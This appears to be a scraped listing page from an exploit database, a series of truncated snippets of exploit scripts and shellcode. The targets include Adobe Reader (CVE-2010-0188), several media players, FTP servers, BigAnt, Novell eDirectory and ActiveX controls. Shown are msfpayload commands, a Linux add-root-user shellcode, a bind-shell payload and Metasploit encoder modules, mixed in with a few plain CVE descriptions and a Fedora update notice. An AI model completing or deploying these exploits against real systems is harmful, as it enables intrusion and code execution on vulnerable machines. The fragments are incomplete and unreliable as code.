Adobe-Reader-PDF-LibTiff

Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: 8.3.0, 9.3.0 CVE: 2010-0188 import sys import base64 import struct import zlib import StringIO SHELLCODEOFFSET=0x555 TIFFOFSET=0x2038 windows/exec - 227 bytes http://www.metasploit.com Encoder:...

ABBS-Audio-Media-Player-3.1-(.lst)

Exploit Title: ABBS Audio Media Player v3.1 .lst Buffer Overflow Version: v3.1 Date: 2013-05-04 from struct import pack file="exploit.lst" windows/exec CMD=calc.exe Encoder: x86/shikataganai powered by Metasploit msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode =...

Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)

Linux/x86-64 - Add Root User shell-storm/leet + Polymorphic Shellcode 273 bytes. Shellcode exploit for Linuxx86-64 platform ; =================================================================== ; "Polymorphic" version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-658.php ;...

Design/Logic Flaw

The ISO-8859-1 encoder in Resin Pro before 4.0.40 does not properly perform Unicode transformations, which allows remote attackers to bypass intended text restrictions via crafted characters, as demonstrated by bypassing an XSS protection mechanism...

CVE-2014-2966

The ISO-8859-1 encoder in Resin Pro before 4.0.40 does not properly perform Unicode transformations, which allows remote attackers to bypass intended text restrictions via crafted characters, as demonstrated by bypassing an XSS protection mechanism...

CVE-2014-2966

CVE-2014-2966 affects Resin Pro before 4.0.40. The ISO-8859-1 encoder does not perform Unicode transformations correctly, allowing crafted characters to bypass restrictions and the XSS protection mechanism in HTTP responses. The primary affected component is Resin Pro’s ISO-8859-1 output handling...

[SECURITY] Fedora 19 Update: python-simplejson-3.5.3-1.fc19

simplejson is a simple, fast, complete, correct and extensible JSON encoder and decoder for Python 2.5+. It is pure Python co de with no dependencies, but includes an optional C extension for a serious sp eed boost. The encoder may be subclassed to provide serialization in any kind of situation,...

Perl Command Encoder

This encoder uses perl to avoid commonly restricted characters. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Perl Command Encoder', 'Description' = %q This encoder uses perl to avoid commonl...

Echo Command Encoder

This encoder uses echo and backlash escapes to avoid commonly restricted characters. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Echo Command Encoder', 'Description' = %q This encoder uses...

AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF

No description provided by source. !/usr/bin/python Author contact : seeleymagicathotmaildotcom For educational purposes only You have been warned My original crash breakdown: EAX 001B0020 UNICODE AAAAAAAAAAAAAAAAAAAA ECX 00000273 EDX 00000C4C EBX 00000000 ESP 0012DCA8 EBP 0012DD64 ESI 001B6610...

gAlan 0.2.1 - Buffer Overflow 0day Exploit

No description provided by source. !/usr/bin/perl kpasa.pl AKA gAlan Buffer Overflow 0day Exploit Jeremy Brown [email protected]//jbrownsec.blogspot.com//krakowlabs.com 12.07.2009 From Static Analysis to 0day Exploit Originally a SecurityTubeCon Presentation, which I'm guessing was canceled...

Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)

No description provided by source. usage: exploit.py print print Destiny Media Player 1.61 .lst File Local Stack Overflow Exploit\n print Founder: Encrypt3d.M!nd print exploit & code: Stack print Tested on: Windows XP Pro SP2 Fr\n print Greetings to: print All friends \n print buff = \x41 2052 EI...

WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit

No description provided by source. !/usr/bin/perl WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit --------------------------------------------------- Exploit by SkD [email protected] This is a remote heap overflow exploit for WFTPD Explorer Pro 1.0 by Texas Imperial Software. Vendors website...

SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/876/info UnixWare is a variant of the Unix operating system originally written by SCO, and distributed and maintained by Caldera. i20dialogd is a daemon which provides a front-end for controlling the i20 subsystem. It is...

FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)

No description provided by source. html object classid='clsid:62A989CE-D39A-11D5-86F0-B9C370762176' id='target'/object script language='vbscript' ' Exploit Title: FathFTP 1.8 SEH EnumFiles ActiveX Buffer Overflow ' Author: MadjiX ' Software Link: http://www.fathsoft.com/fathftp.html ' Version 1.7...

Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow

No description provided by source. var nop=unescape"%u9090%u9090"; var...

IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit

No description provided by source. !/usr/bin/env python IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate - Open Migration Project - Bind Shell Download: www.pointdev.com Tested On: Windows XPSP3 windows/shellbindtcp - 696 bytes Encoder: x86/alphamixed...

Ericom AccessNow Server Buffer Overflow

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initializein...

BigAnt Server 2.52 - SEH (0day)

No description provided by source. !/usr/bin/python import socket, sys BigAnt version 2.52 0day Tested on XPSP2 & Win2k3 SP2 Discovered by Lincoln Thanks to muts & remote-exploit 650 or so bytes available after seh, easier to jump back root@BT4VM: ./bigant.py 192.168.87.130 Exploit sent! Connect ...

Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit

No description provided by source. / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | | \ / | |/ | |/ / \ / \ | / \ // | Y / ^ /\ | //\ \ /| / / || /\ | \ | \ / / / / 30\10\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet...